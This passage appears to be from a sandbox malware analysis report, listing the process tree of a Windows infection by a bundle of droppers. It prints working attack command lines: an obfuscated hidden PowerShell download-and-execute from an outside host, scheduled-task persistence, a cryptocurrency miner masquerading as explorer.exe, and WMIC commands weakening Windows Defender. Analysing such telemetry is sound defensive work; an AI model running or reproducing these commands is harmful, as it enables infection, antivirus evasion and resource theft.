        schtasks /CREATE /TN "gxiSwVdVE" /SC once /ST 02:24:27 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        11⤵
        Creates scheduled task(s)
        
        PID:5216
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gxiSwVdVE"
        11⤵
        
        PID:4576
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "gxiSwVdVE"
        11⤵
        
        PID:5080
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bRciptYQhTCMvEFWGJ" /SC once /ST 05:00:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\iXkrQovqyvDrylo\QfXqdKG.exe\" W8 /site_id 668658 /S" /V1 /F
        11⤵
        Creates scheduled task(s)
        
        PID:8412
        
        C:\Users\Admin\Documents\1RWl7yriNyjXtTQkX0aS3CZn.exe
        
        "C:\Users\Admin\Documents\1RWl7yriNyjXtTQkX0aS3CZn.exe"
        8⤵
        
        PID:4992
        
        C:\Users\Admin\Documents\SorEG6bFaQqxi2HiQ7V80zOQ.exe
        
        "C:\Users\Admin\Documents\SorEG6bFaQqxi2HiQ7V80zOQ.exe"
        8⤵
        
        PID:2700
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:7928
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:7960
      - C:\Users\Admin\Documents\vMwIYmBFTFbdkHYKDHeR2Pq5.exe
        
        "C:\Users\Admin\Documents\vMwIYmBFTFbdkHYKDHeR2Pq5.exe"
        6⤵
        
        PID:5788
        
        C:\Users\Admin\AppData\Roaming\7723618.scr
        
        "C:\Users\Admin\AppData\Roaming\7723618.scr" /S
        7⤵
        
        PID:6652
        
        C:\Users\Admin\AppData\Roaming\5735546.scr
        
        "C:\Users\Admin\AppData\Roaming\5735546.scr" /S
        7⤵
        
        PID:7552
        
        C:\Users\Admin\AppData\Roaming\2099048.scr
        
        "C:\Users\Admin\AppData\Roaming\2099048.scr" /S
        7⤵
        
        PID:2352
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun19262b9e49ad.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3032
    - - C:\Users\Admin\AppData\Local\Temp\7zS093FEA51\Sun19262b9e49ad.exe
        
        Sun19262b9e49ad.exe
        5⤵
        
        PID:584
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        6⤵
        
        PID:5540
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        7⤵
        Kills process with taskkill
        
        PID:6392
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun19e4ade31b2a.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2892
    - - C:\Users\Admin\AppData\Local\Temp\7zS093FEA51\Sun19e4ade31b2a.exe
        
        Sun19e4ade31b2a.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3988
      - C:\Users\Admin\AppData\Roaming\1395408.scr
        
        "C:\Users\Admin\AppData\Roaming\1395408.scr" /S
        6⤵
        
        PID:4868
      - C:\Users\Admin\AppData\Roaming\3036575.scr
        
        "C:\Users\Admin\AppData\Roaming\3036575.scr" /S
        6⤵
        
        PID:4916
      - C:\Users\Admin\AppData\Roaming\7511746.scr
        
        "C:\Users\Admin\AppData\Roaming\7511746.scr" /S
        6⤵
        
        PID:4352
      - C:\Users\Admin\AppData\Roaming\2800270.scr
        
        "C:\Users\Admin\AppData\Roaming\2800270.scr" /S
        6⤵
        
        PID:4260
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun1908b94df837b3158.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3484
    - - C:\Users\Admin\AppData\Local\Temp\7zS093FEA51\Sun1908b94df837b3158.exe
        
        Sun1908b94df837b3158.exe
        5⤵
        Executes dropped EXE
        
        PID:3184
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun198361825f4.exe
      4⤵
      PID:512
    - - C:\Users\Admin\AppData\Local\Temp\7zS093FEA51\Sun198361825f4.exe
        
        Sun198361825f4.exe
        5⤵
        Executes dropped EXE
        
        PID:4204
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun1966fb31dd5a07.exe
      4⤵
      PID:684
    - - C:\Users\Admin\AppData\Local\Temp\7zS093FEA51\Sun1966fb31dd5a07.exe
        
        Sun1966fb31dd5a07.exe
        5⤵
        Executes dropped EXE
        
        PID:4312
      - C:\Users\Admin\AppData\Local\Temp\is-3L2F2.tmp\Sun1966fb31dd5a07.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-3L2F2.tmp\Sun1966fb31dd5a07.tmp" /SL5="$50056,247014,163328,C:\Users\Admin\AppData\Local\Temp\7zS093FEA51\Sun1966fb31dd5a07.exe"
        6⤵
        
        PID:4472
        
        C:\Users\Admin\AppData\Local\Temp\is-T6KM3.tmp\Ze2ro.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-T6KM3.tmp\Ze2ro.exe" /S /UID=burnerch2
        7⤵
        
        PID:4688
        
        C:\Program Files\Google\IFGBFWQGEX\ultramediaburner.exe
        
        "C:\Program Files\Google\IFGBFWQGEX\ultramediaburner.exe" /VERYSILENT
        8⤵
        
        PID:5264
        
        C:\Users\Admin\AppData\Local\Temp\is-PF3U9.tmp\ultramediaburner.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-PF3U9.tmp\ultramediaburner.tmp" /SL5="$202A8,281924,62464,C:\Program Files\Google\IFGBFWQGEX\ultramediaburner.exe" /VERYSILENT
        9⤵
        
        PID:5132
        
        C:\Users\Admin\AppData\Local\Temp\5b-e27e6-212-d0098-753eac9ed05eb\Jetavolepy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\5b-e27e6-212-d0098-753eac9ed05eb\Jetavolepy.exe"
        8⤵
        
        PID:6292
        
        C:\Users\Admin\AppData\Local\Temp\60-0a67e-ab9-98ab7-e604854993cda\Jyfejesulae.exe
        
        "C:\Users\Admin\AppData\Local\Temp\60-0a67e-ab9-98ab7-e604854993cda\Jyfejesulae.exe"
        8⤵
        
        PID:4116
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wvfltaui.ztm\GcleanerEU.exe /eufive & exit
        9⤵
        
        PID:4576
        
        C:\Users\Admin\AppData\Local\Temp\wvfltaui.ztm\GcleanerEU.exe
        
        C:\Users\Admin\AppData\Local\Temp\wvfltaui.ztm\GcleanerEU.exe /eufive
        10⤵
        
        PID:8348
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gfz1vmrg.ei2\installer.exe /qn CAMPAIGN="654" & exit
        9⤵
        
        PID:7664
        
        C:\Users\Admin\AppData\Local\Temp\gfz1vmrg.ei2\installer.exe
        
        C:\Users\Admin\AppData\Local\Temp\gfz1vmrg.ei2\installer.exe /qn CAMPAIGN="654"
        10⤵
        
        PID:8528
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\gfz1vmrg.ei2\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\gfz1vmrg.ei2\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1632113511 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
        11⤵
        
        PID:8156
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vrasreof.lqa\anyname.exe & exit
        9⤵
        
        PID:7528
        
        C:\Users\Admin\AppData\Local\Temp\vrasreof.lqa\anyname.exe
        
        C:\Users\Admin\AppData\Local\Temp\vrasreof.lqa\anyname.exe
        10⤵
        
        PID:8696
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1tw1vjt1.oc1\gcleaner.exe /mixfive & exit
        9⤵
        
        PID:652
        
        C:\Users\Admin\AppData\Local\Temp\1tw1vjt1.oc1\gcleaner.exe
        
        C:\Users\Admin\AppData\Local\Temp\1tw1vjt1.oc1\gcleaner.exe /mixfive
        10⤵
        
        PID:8804
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun195a1614ec24e6a.exe
      4⤵
      PID:908
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun1905815e51282417.exe
      4⤵
      PID:3908
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun19eb40faaaa9.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1796
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun191101c1aaa.exe
      4⤵
      PID:3748
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun19de8ff4b6aefeb8.exe /mixone
      4⤵
      PID:4072
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun193fda712d9f1.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2604

C:\Users\Admin\AppData\Local\Temp\7zS093FEA51\Sun19eb40faaaa9.exe
Sun19eb40faaaa9.exe
1⤵
- Executes dropped EXE
PID:2764
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2764 -s 908
  2⤵
  - Program crash
  PID:5708

C:\Users\Admin\AppData\Local\Temp\7zS093FEA51\Sun1905815e51282417.exe
Sun1905815e51282417.exe
1⤵
PID:4188

C:\Users\Admin\AppData\Local\Temp\7zS093FEA51\Sun191101c1aaa.exe
Sun191101c1aaa.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4168
- C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
  "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
  2⤵
  PID:4744
- - C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
    "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
    3⤵
    PID:4968
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
      4⤵
      PID:3344
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        5⤵
        Creates scheduled task(s)
        
        PID:4124
  - - C:\Users\Admin\AppData\Roaming\services64.exe
      "C:\Users\Admin\AppData\Roaming\services64.exe"
      4⤵
      PID:5176
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        5⤵
        
        PID:7160
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Creates scheduled task(s)
        
        PID:4472
    - - C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        5⤵
        
        PID:3964
    - - C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
        5⤵
        
        PID:8232
- - C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
    "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
    3⤵
    PID:5012
  - - C:\ProgramData\5647709.exe
      "C:\ProgramData\5647709.exe"
      4⤵
      PID:5396
  - - C:\ProgramData\3688907.exe
      "C:\ProgramData\3688907.exe"
      4⤵
      PID:6128
  - - C:\ProgramData\5426748.exe
      "C:\ProgramData\5426748.exe"
      4⤵
      PID:5128
    - - C:\ProgramData\5426748.exe
        
        "C:\ProgramData\5426748.exe"
        5⤵
        
        PID:5800
  - - C:\ProgramData\6523842.exe
      "C:\ProgramData\6523842.exe"
      4⤵
      PID:1168
- - C:\Users\Admin\AppData\Local\Temp\2.exe
    "C:\Users\Admin\AppData\Local\Temp\2.exe"
    3⤵
    PID:5116
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 5116 -s 1556
      4⤵
      Program crash
      PID:5888
- - C:\Users\Admin\AppData\Local\Temp\udptest.exe
    "C:\Users\Admin\AppData\Local\Temp\udptest.exe"
    3⤵
    PID:4436
- - C:\Users\Admin\AppData\Local\Temp\5.exe
    "C:\Users\Admin\AppData\Local\Temp\5.exe"
    3⤵
    PID:4700
  - - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
      "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
      4⤵
      PID:3588
    - - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        5⤵
        
        PID:4124
- - C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe
    "C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe"
    3⤵
    PID:4600
  - - C:\Users\Admin\AppData\Local\Temp\tmpE375_tmp.exe
      "C:\Users\Admin\AppData\Local\Temp\tmpE375_tmp.exe"
      4⤵
      PID:5028
    - - C:\Users\Admin\AppData\Local\Temp\tmpE375_tmp.exe
        
        C:\Users\Admin\AppData\Local\Temp\tmpE375_tmp.exe
        5⤵
        
        PID:2420
- - C:\Users\Admin\AppData\Local\Temp\setup_2.exe
    "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
    3⤵
    PID:2676
  - - C:\Users\Admin\AppData\Local\Temp\is-0LMQ9.tmp\setup_2.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-0LMQ9.tmp\setup_2.tmp" /SL5="$10280,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
      4⤵
      PID:5280
    - - C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
        5⤵
        
        PID:6048
      - C:\Users\Admin\AppData\Local\Temp\is-H9BGM.tmp\setup_2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-H9BGM.tmp\setup_2.tmp" /SL5="$202A6,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
        6⤵
        
        PID:4884
        
        C:\Users\Admin\AppData\Local\Temp\is-CP6GK.tmp\postback.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-CP6GK.tmp\postback.exe" ss1
        7⤵
        
        PID:3588
        
        C:\Windows\SysWOW64\explorer.exe
        
        explorer.exe ss1
        8⤵
        
        PID:3808
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        9⤵
        
        PID:4428
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        10⤵
        
        PID:4476
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\JXNSQ1AY7.dll"
        9⤵
        
        PID:6628
        
        C:\Windows\SysWOW64\regsvr32.exe
        
        regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\JXNSQ1AY7.dll"
        10⤵
        
        PID:7800
        
        C:\Windows\system32\regsvr32.exe
        
        /s "C:\Users\Admin\AppData\Local\Temp\JXNSQ1AY7.dll"
        11⤵
        
        PID:7900
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\JXNSQ1AY7.dlliriqF3G37.dll"
        9⤵
        
        PID:7220
        
        C:\Windows\SysWOW64\regsvr32.exe
        
        regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\JXNSQ1AY7.dlliriqF3G37.dll"
        10⤵
        
        PID:7712
        
        C:\Windows\system32\regsvr32.exe
        
        /s "C:\Users\Admin\AppData\Local\Temp\JXNSQ1AY7.dlliriqF3G37.dll"
        11⤵
        
        PID:7808
- - C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
    "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
    3⤵
    PID:5340
- - C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
    "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
    3⤵
    PID:5568
- - C:\Users\Admin\AppData\Local\Temp\3002.exe
    "C:\Users\Admin\AppData\Local\Temp\3002.exe"
    3⤵
    PID:5144
- - C:\Users\Admin\AppData\Local\Temp\setup.exe
    "C:\Users\Admin\AppData\Local\Temp\setup.exe"
    3⤵
    PID:4248

C:\Users\Admin\AppData\Local\Temp\7zS093FEA51\Sun19de8ff4b6aefeb8.exe
Sun19de8ff4b6aefeb8.exe /mixone
1⤵
- Executes dropped EXE
PID:4160
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 676
  2⤵
  - Program crash
  PID:3640
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 592
  2⤵
  - Program crash
  PID:5380
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 664
  2⤵
  - Program crash
  PID:3808
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 656
  2⤵
  - Program crash
  PID:4488
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 888
  2⤵
  - Program crash
  PID:4412
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 956
  2⤵
  - Program crash
  PID:6220
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 1176
  2⤵
  - Program crash
  PID:6676
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 1188
  2⤵
  - Program crash
  PID:7032
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 1284
  2⤵
  - Program crash
  PID:4548
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 1276
  2⤵
  - Program crash
  PID:5524

C:\Users\Admin\AppData\Local\Temp\7zS093FEA51\Sun195a1614ec24e6a.exe
Sun195a1614ec24e6a.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4152

C:\Users\Admin\AppData\Local\Temp\7zS093FEA51\Sun193fda712d9f1.exe
Sun193fda712d9f1.exe
1⤵
- Executes dropped EXE
PID:1792

C:\Users\Admin\AppData\Local\Temp\3002.exe
"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
1⤵
PID:636

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4248 -s 680
1⤵
- Program crash
PID:4716

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4352 -s 956
1⤵
- Program crash
PID:5552

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4248 -s 840
1⤵
- Program crash
PID:2628

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4248 -s 856
1⤵
- Program crash
PID:5916

C:\Users\Admin\AppData\Roaming\7511746.scr
"C:\Users\Admin\AppData\Roaming\7511746.scr"
1⤵
PID:5208

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4248 -s 880
1⤵
- Program crash
PID:6024

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:4172

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4248 -s 972
1⤵
- Program crash
PID:4240

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4248 -s 956
1⤵
- Program crash
PID:5092

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
PID:3344

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:4468

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:6296
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:6336

C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
1⤵
PID:7124

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:7368

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:680

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8896

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8204

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8652

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:1296
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 1E9EEFE77AC7AFC4957DE756C3B27DB0 C
  2⤵
  PID:8284
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 3FB30D8526D17EA7C9CBD93B3EF4DD5B
  2⤵
  PID:8388
- - C:\Windows\SysWOW64\taskkill.exe
    "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
    3⤵
    - Kills process with taskkill
    PID:9176

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:9052

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:8096

C:\Users\Admin\AppData\Local\Temp\FAFC.exe
C:\Users\Admin\AppData\Local\Temp\FAFC.exe
1⤵
PID:4912

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5080

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:8804
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:4732

C:\Users\Admin\AppData\Local\Temp\39DB.exe
C:\Users\Admin\AppData\Local\Temp\39DB.exe
1⤵
PID:4284

C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\iXkrQovqyvDrylo\QfXqdKG.exe
C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\iXkrQovqyvDrylo\QfXqdKG.exe W8 /site_id 668658 /S
1⤵
PID:7988
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
  2⤵
  PID:4548
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
    3⤵
    PID:9068
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
      4⤵
      PID:3028
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
